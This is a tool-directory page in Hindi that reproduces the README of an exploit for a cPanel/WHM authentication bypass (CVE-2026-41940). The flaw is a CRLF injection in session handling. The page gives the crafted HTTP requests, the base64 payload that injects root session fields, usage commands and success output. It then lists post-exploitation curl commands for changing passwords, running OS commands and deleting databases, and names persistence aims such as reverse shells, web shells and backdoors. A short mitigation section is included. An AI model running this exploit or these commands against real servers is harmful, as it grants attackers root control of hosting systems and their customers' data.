Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cPanel-WHM-CVE-2026-41940-auth-bypass-exploit — cPanel/WHM CVE-2026-41940 के लिए गंभीर प्रमाणीकरण बायपास एक्सप्लॉइट। cpsrvd डेमॉन में CRLF इंजेक्शन का लाभ उठाकर बिना क्रेडेंशियल के रूट WHM एक्सेस प्राप्त करता है। इसमें संस्करण पहचान, विस्तृत लॉगिंग, प्रॉक्सी समर्थन, JSON रिपोर्टिंग और पोस्ट-एक्सप्लॉइटेशन खाता गणना शामिल है। केवल अधिकृत सुरक्षा परीक्षण के लिए। | Kitploit
उपकरण/GitHubGitHub/cerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubcerberusmrxi/cpanel-whm-cve-2026-41940-auth-bypass-exploit

cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

रिपॉजिटरी देखें
231 महीना पहलेअभी तक समीक्षित नहीं

cPanel/WHM CVE-2026-41940 के लिए गंभीर प्रमाणीकरण बायपास एक्सप्लॉइट। cpsrvd डेमॉन में CRLF इंजेक्शन का लाभ उठाकर बिना क्रेडेंशियल के रूट WHM एक्सेस प्राप्त करता है। इसमें संस्करण पहचान, विस्तृत लॉगिंग, प्रॉक्सी समर्थन, JSON रिपोर्टिंग और पोस्ट-एक्सप्लॉइटेशन खाता गणना शामिल है। केवल अधिकृत सुरक्षा परीक्षण के लिए।

साझा करें

CVE-2026-41940 - cPanel और WHM प्रमाणीकरण बायपास एक्सप्लॉइट

PythonLicenseCVECVSSStatus

cPanel/WHM cpsrvd डेमॉन में CRLF इंजेक्शन के माध्यम से गंभीर प्रमाणीकरण बायपास


📋 अवलोकन

CVE-2026-41940, cPanel और WHM में एक गंभीर प्रमाणीकरण बायपास भेद्यता है जो बिना प्रमाणीकरण वाले दूरस्थ हमलावरों को सर्वर तक रूट-स्तरीय प्रशासनिक पहुँच प्राप्त करने की अनुमति देती है। यह भेद्यता cpsrvd डेमॉन की सत्र हैंडलिंग में मौजूद है, विशेष रूप से Cpanel/Session.pm के भीतर, जहाँ whostmgrsession कुकी और Authorization हेडर में लाइन डिलीमीटर (CRLF) का अनुचित न्यूट्रलाइज़ेशन सत्र पैरामीटर इंजेक्शन को सक्षम बनाता है।

CVSS स्कोरएक्सप्लॉइट प्रकारप्रभावहमला वेक्टर
9.8प्रमाणीकरण बायपासरूट एक्सेसनेटवर्क
c

⚡ मुख्य विशेषताएँ

यह एक्सप्लॉइट टूल निम्नलिखित मुख्य विशेषताएँ प्रदान करता है:

  • 🔓 प्रमाणीकरण बायपास - बिना क्रेडेंशियल के रूट WHM एक्सेस प्राप्त करें

  • 🛡️ एकाधिक बायपास तकनीकें - स्वचालित रूप से विभिन्न सत्यापन विधियों का प्रयास करता है

  • 🌐 प्रॉक्सी समर्थन - HTTP/HTTPS प्रॉक्सी के माध्यम से ट्रैफ़िक रूट करें

  • 📊 JSON रिपोर्टिंग - विस्तृत मूल्यांकन रिपोर्ट तैयार करें

  • 📝 व्यापक लॉगिंग - टाइमस्टैम्प के साथ वर्बोज़ डीबग मोड

  • 🔍 संस्करण पहचान - स्वचालित रूप से भेद्य संस्करणों का पता लगाएं और जांचें

  • 👥 खाता गणना - एक्सप्लॉइटेशन के बाद सभी cPanel खातों की सूची बनाएं

  • 🎯 एकाधिक एंडपॉइंट - सत्यापन के लिए विभिन्न API एंडपॉइंट का प्रयास करता है


🚨 भेद्यता विवरण

🔬 तकनीकी विश्लेषण

यह भेद्यता दो मुख्य समस्याओं से उत्पन्न होती है:

  1. सत्र भंडारण में CRLF इंजेक्शन - saveSession फ़ंक्शन सत्र फ़ाइल में लिखने से पहले pass फ़ील्ड में न्यूलाइन वर्णों (\n) को सैनिटाइज़ करने में विफल रहता है, जिससे मनमाने सत्र पैरामीटर इंजेक्ट किए जा सकते हैं।

  2. सशर्त एन्कोडिंग बायपास - जब सत्र कुकी में ob भाग (अल्पविराम के बाद का खंड) अनुपस्थित होता है, तो pass मान बिना एन्कोडिंग (क्लियरटेक्स्ट) के लिखा जाता है, जिससे CRLF अनुक्रमों का इंजेक्शन संभव हो जाता है।

🎯 प्रभावित संस्करण


📦 स्थापना

पूर्वापेक्षाएँ

root@kitploit:~
# Python 3.6 or higher required
python3 --version

# Install required packages
pip install -r requirements.txt

आवश्यकताएँ फ़ाइल

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0

रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/CerberusMrXi/cPanel-WHM-CVE-2026-41940-auth-bypass-exploit.git
cd cPanel-WHM-CVE-2026-41940-auth-bypass-exploit

🚀 उपयोग

मूल उपयोग

root@kitploit:~
python3 exploit.py --target https://target.com:2087

उन्नत उपयोग

root@kitploit:~
# Verbose mode with debug output
python3 exploit.py --target https://target.com:2087 --verbose

# Through proxy
python3 exploit.py --target https://target.com:2087 --proxy http://127.0.0.1:8080

# Save report and list accounts
python3 exploit.py --target https://target.com:2087 --output report.json --list-accounts

# Custom timeout
python3 exploit.py --target https://target.com:2087 --timeout 30

उदाहरण आउटपुट

root@kitploit:~
=======================================================
 CVE-2026-41940 - cPanel/WHM Authentication Bypass
 Critical CRLF Injection in cpsrvd (CVSS: 9.8 )
 Exploit Version: 1.0
=======================================================
 Target      : https://target.com:2087
 Started     : 2026-07-26 22:23:18
=======================================================
2026-07-26 22:23:18 [INFO] Detecting cPanel/WHM version...
2026-07-26 22:23:19 [INFO] Version: 11.110.0.85 - Vulnerable
2026-07-26 22:23:19 [INFO] Attempting to mint pre-authentication session...
2026-07-26 22:23:20 [INFO] Pre-authentication session obtained successfully
2026-07-26 22:23:20 [INFO] Injecting CRLF payload via Authorization header...
2026-07-26 22:23:21 [INFO] Token leaked: /cpsess1234567890
2026-07-26 22:23:21 [INFO] Verifying root access with multiple bypass techniques...
2026-07-26 22:23:25 [INFO] Access verified with URL format: /cpsess-{token}

=======================================================
 EXPLOIT SUCCESSFUL
=======================================================
 Target              : https://target.com:2087
 Token               : /cpsess1234567890
 Admin URL           : https://target.com:2087/cpsess1234567890/
 Version             : 11.110.0.85
 Verification Method : url_format
 Completed           : 2026-07-26 22:23:25
=======================================================

[!] Access WHM with the token above
[!] Use the token in all subsequent requests
[!] Example: curl -k "https://target.com:2087/cpsess1234567890/json-api/version?api.version=1"
=======================================================

🔧 कमांड लाइन तर्क


🔬 एक्सप्लॉइट पद्धति

चरण 1: प्री-प्रमाणीकरण सत्र निर्माण

एक्सप्लॉइट पहले असफल लॉगिन का प्रयास करके प्री-प्रमाणीकरण सत्र कुकी प्राप्त करता है:

root@kitploit:~
POST /login/?login_only=1 HTTP/1.1
Host: target.com:2087
Content-Type: application/x-www-form-urlencoded

user=root&pass=wrong_pass

प्रतिक्रिया:

root@kitploit:~
Set-Cookie: whostmgrsession=base64_encoded_data

चरण 2: CRLF इंजेक्शन

निर्मित Authorization हेडर दुर्भावनापूर्ण सत्र पैरामीटर इंजेक्ट करता है:

root@kitploit:~
GET / HTTP/1.1
Host: target.com:2087
Authorization: Basic cm9vdDp4DQpzdWNjZXNzZnVsX2ludGVybmFsX2F1dGhfd2l0aF90aW1lc3RhbXA9OTk5OTk5OTk5OQ0KdXNlcj1yb290DQp0ZmFfdmVyaWZpZWQ9MQ0KaGFzcm9vdD0x
Cookie: whostmgrsession=[SESSION_BASE]

डिकोड किया गया पेलोड:

root@kitploit:~
root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1

चरण 3: टोकन निष्कर्षण

सर्वर प्रशासनिक सत्र टोकन युक्त रीडायरेक्ट के साथ प्रतिक्रिया करता है:

root@kitploit:~
Location: /cpsess1234567890/

चरण 4: एक्सेस सत्यापन

एक्सप्लॉइट रूट एक्सेस की पुष्टि के लिए कई सत्यापन विधियों का प्रयास करता है।


🎯 पोस्ट-एक्सप्लॉइटेशन कमांड

एक्सप्लॉइट सफल होने के बाद, प्राप्त टोकन के साथ निम्नलिखित कमांड का उपयोग करें:

सर्वर जानकारी

root@kitploit:~
# Get server version
curl -k "https://target.com:2087/cpsess-1234567890/json-api/version?api.version=1"

# Get server information
curl -k "https://target.com:2087/cpsess-1234567890/json-api/server_info?api.version=1"

# Get hostname
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_hostname?api.version=1"

# Get load average
curl -k "https://target.com:2087/cpsess-1234567890/json-api/loadavg?api.version=1"

# Get CPU usage
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_cpu_usage?api.version=1"

# Get memory usage
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_memory_usage?api.version=1"

# Get disk usage
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_disk_usage?api.version=1"

# Server time
curl -k "https://target.com:2087/cpsess-1234567890/json-api/server_time?api.version=1"

# Service status
curl -k "https://target.com:2087/cpsess-1234567890/json-api/service_status?api.version=1"

खाता प्रबंधन

root@kitploit:~
# List all cPanel accounts
curl -k "https://target.com:2087/cpsess-1234567890/json-api/listaccts?api.version=1"

# List accounts with details
curl -k "https://target.com:2087/cpsess-1234567890/json-api/account_list?api.version=1"

# Account summary
curl -k "https://target.com:2087/cpsess-1234567890/json-api/account_summary?api.version=1"

# Domain information
curl -k "https://target.com:2087/cpsess-1234567890/json-api/domain_info?api.version=1"

# Email statistics
curl -k "https://target.com:2087/cpsess-1234567890/json-api/email_stats?api.version=1"

# PHP configuration
curl -k "https://target.com:2087/cpsess-1234567890/json-api/php_ini?api.version=1"

WHM स्क्रिप्ट

root@kitploit:~
# Server status
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/serverstatus"

# System information
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/sysinfo"

# List accounts (alternative )
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/listaccts"

# Show processes
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/showprocs"

# Disk usage
curl -k "https://target.com:2087/cpsess-1234567890/scripts2/diskusage"

प्रशासनिक क्रियाएँ

root@kitploit:~
# Change user password
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/passwd" \
  -d "user=root&pass=NewP@ss123"

# Create new account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/createacct" \
  -d "username=testuser&domain=test.com&password=TestPass123&plan=default"

# Execute OS commands
curl -k -X POST "https://target.com:2087/cpsess-1234567890/scripts/run_script" \
  -d "script=id"

# Suspend account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/suspendacct" \
  -d "user=testuser"

# Unsuspend account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/unsuspendacct" \
  -d "user=testuser"

# Remove account
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/removeacct" \
  -d "user=testuser"

सुरक्षा जानकारी

root@kitploit:~
# Get security advisor info
curl -k "https://target.com:2087/cpsess-1234567890/json-api/security_advisor?api.version=1"

# Get SSH key info
curl -k "https://target.com:2087/cpsess-1234567890/json-api/get_ssh_keys?api.version=1"

# Check firewall status
curl -k "https://target.com:2087/cpsess-1234567890/json-api/firewall_status?api.version=1"

# Get SSL certificates
curl -k "https://target.com:2087/cpsess-1234567890/json-api/ssl_certificates?api.version=1"

डेटाबेस संचालन

root@kitploit:~
# List MySQL databases
curl -k "https://target.com:2087/cpsess-1234567890/json-api/databases?api.version=1"

# Create database
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/create_db" \
  -d "db=test_db"

# Delete database
curl -k -X POST "https://target.com:2087/cpsess-1234567890/json-api/delete_db" \
  -d "db=test_db"

# List database users
curl -k "https://target.com:2087/cpsess-1234567890/json-api/db_users?api.version=1"

🛡️ पोस्ट-एक्सप्लॉइटेशन क्षमताएँ

रूट WHM एक्सेस प्राप्त होने के बाद, एक हमलावर निम्न कार्य कर सकता है:

खाता प्रबंधन

  • 🔍 सभी cPanel खातों की सूची बनाएं

  • 👤 नए cPanel खाते बनाएं

  • 🔑 खाता पासवर्ड संशोधित करें

  • ❌ खाते हटाएं या निलंबित करें

सर्वर नियंत्रण

  • 🖥️ OS कमांड निष्पादित करें

  • 🔄 रूट पासवर्ड बदलें

  • 📊 सर्वर आँकड़े देखें

  • 🗄️ MySQL डेटाबेस प्रबंधित करें

स्थिरता

  • 🐚 रिवर्स शेल तैनात करें

  • 🌐 वेब शेल स्थापित करें

  • 🗝️ बैकडोर स्थापित करें

  • 🔒 छिपे हुए एडमिन खाते बनाएं

डेटा एक्सेस

  • 📁 सभी सर्वर फ़ाइलों तक पहुँचें

  • 💾 डेटाबेस निर्यात करें

  • 📧 ईमेल खाते पढ़ें

  • 🔐 SSL प्रमाणपत्रों तक पहुँचें


🚨 आपातकालीन शमन

तत्काल कार्रवाइयाँ

root@kitploit:~
# 1. Update cPanel/WHM immediately
/scripts/upcp --force

# 2. Invalidate all active sessions
rm -rf /var/cpanel/sessions/raw/*
rm -rf /var/cpanel/sessions/cache/*
systemctl restart cpanel

# 3. Restrict WHM access to trusted IPs
# Add to /etc/csf/csf.conf
# Or configure firewall

# 4. Enable Multi-Factor Authentication (MFA )
# WHM > Security Center > Two-Factor Authentication

# 5. Change ALL passwords
# - Root password
# - All cPanel user passwords
# - Database passwords
# - FTP passwords

# 6. Audit system for backdoors
find / -type f -mtime -7 -name "*.php" -o -name "*.pl" -o -name "*.cgi"

# 7. Check for malicious cron jobs
crontab -l
for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l; done

# 8. Check SSH authorized keys
for user in $(cut -f1 -d: /etc/passwd); do
  echo "=== $user ==="
  cat /home/$user/.ssh/authorized_keys 2>/dev/null
done

दीर्घकालिक रोकथाम

  • ✅ CRLF इंजेक्शन रोकने के लिए सख्त इनपुट सत्यापन लागू करें

  • ✅ दुर्भावनापूर्ण अनुरोधों का पता लगाने और ब्लॉक करने के लिए WAF नियम तैनात करें

  • ✅ WHM के लिए IP-आधारित एक्सेस प्रतिबंध सक्षम करें

  • ✅ cPanel/WHM को नियमित रूप से नवीनतम संस्करणों में अपडेट करें

  • ✅ नियमित सुरक्षा मूल्यांकन करें

  • ✅ संदिग्ध गतिविधि के लिए लॉग की निगरानी करें

  • ✅ न्यूनतम विशेषाधिकार का सिद्धांत लागू करें

  • ✅ WHM में सुरक्षा सलाहकार सक्षम करें

  • ✅ नियमित सुरक्षा ऑडिट

  • ✅ घुसपैठ का पता लगाने वाली प्रणाली लागू करें


📊 उदाहरण रिपोर्ट

root@kitploit:~
{
  "timestamp": "2026-07-26T22:23:25.123456",
  "target": "https://target.com:2087",
  "status": "success",
  "token": "1234567890",
  "detected_version": "11.110.0.85",
  "vulnerable": true,
  "verification_method": "url_format",
  "notes": "Root access confirmed; Token verified",
  "exploit_name": "CVE-2026-41940",
  "cvss_score": "9.8",
  "description": "cPanel/WHM Authentication Bypass via CRLF Injection",
  "exploit_version": "1.0"
}

⚠️ कानूनी अस्वीकरण

यह टूल केवल शैक्षिक और नैतिक सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। लेखक और योगदानकर्ता इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं हैं। इस टूल का उपयोग करके, आप अपने कार्यों की सारी ज़िम्मेदारी लेने के लिए सहमत होते हैं। किसी भी सिस्टम पर परीक्षण करने से पहले सुनिश्चित करें कि आपके पास स्पष्ट अनुमति है।


🤝 योगदान

हम योगदान का स्वागत करते हैं! कृपया इन चरणों का पालन करें:

  1. 🍴 रिपॉजिटरी को फोर्क करें

  2. 🔧 अपनी फीचर शाखा बनाएं (git checkout -b feature/amazing-feature )

  3. 💾 अपने परिवर्तन कमिट करें (git commit -m 'Add amazing feature')

  4. 📤 शाखा में पुश करें (git push origin feature/amazing-feature)

  5. 🔃 पुल अनुरोध खोलें


📝 परिवर्तन लॉग

v1.0.0 (2026-07-26)

  • 🎉 प्रारंभिक रिलीज़

  • 🔓 CRLF इंजेक्शन एक्सप्लॉइट कार्यान्वयन

  • 🛡️ एकाधिक सत्यापन बायपास तकनीकें

  • 📊 JSON रिपोर्ट निर्माण

  • 🌐 प्रॉक्सी समर्थन

  • 📝 व्यापक लॉगिंग

  • 🔍 संस्करण पहचान

  • 👥 खाता गणना

  • 📚 व्यापक पोस्ट-एक्सप्लॉइटेशन कमांड


📧 संपर्क

  • सुरक्षा सलाह - [email protected]

  • GitHub मुद्दे - मुद्दा बनाएं


📚 संदर्भ

  1. CVE-2026-41940 विवरण

  2. cPanel सुरक्षा सलाह

  3. watchTowr अनुसंधान

  4. CRLF इंजेक्शन चीट शीट

  5. WHM API दस्तावेज़ीकरण


⚠️ याद रखें: महान शक्ति के साथ महान ज़िम्मेदारी आती है! नैतिक रूप से उपयोग करें! ⚠️

सुरक्षा समुदाय के लिए ❤️ के साथ निर्मित

टूल डाउनलोड करें
विशेषतामान
CVE IDCVE-2026-41940
CVSS स्कोर9.8 (गंभीर)
भेद्यता प्रकारCRLF इंजेक्शन के माध्यम से प्रमाणीकरण बायपास
प्रभावित घटकcpsrvd डेमॉन (Cpanel/Session.pm)
हमला वेक्टरनेटवर्क
प्रभावपूर्ण रूट एक्सेस
शोषणबिना प्रमाणीकरण वाला दूरस्थ
रिलीज़ ट्रैकभेद्य संस्करण तकपैच किया गया संस्करण
11.110.x11.110.0.9611.110.0.97
11.118.x11.118.0.6211.118.0.63
11.126.x11.126.0.5311.126.0.54
11.132.x11.132.0.2811.132.0.29
11.134.x11.134.0.1911.134.0.20
11.136.x11.136.0.411.136.0.5
तर्कशॉर्टआवश्यकविवरण
--target-t✅लक्ष्य URL (उदा., https://target.com:2087 )
--verbose-v❌वर्बोज़/डीबग आउटपुट सक्षम करें
--proxy-p❌प्रॉक्सी URL (उदा., http://127.0.0.1:8080 )
--output-o❌JSON रिपोर्ट के लिए आउटपुट फ़ाइल
--timeout❌सेकंड में अनुरोध टाइमआउट (डिफ़ॉल्ट: 10)
--list-accounts-l❌सफल एक्सप्लॉइट के बाद cPanel खाते सूचीबद्ध करें
--version❌एक्सप्लॉइट संस्करण दिखाएं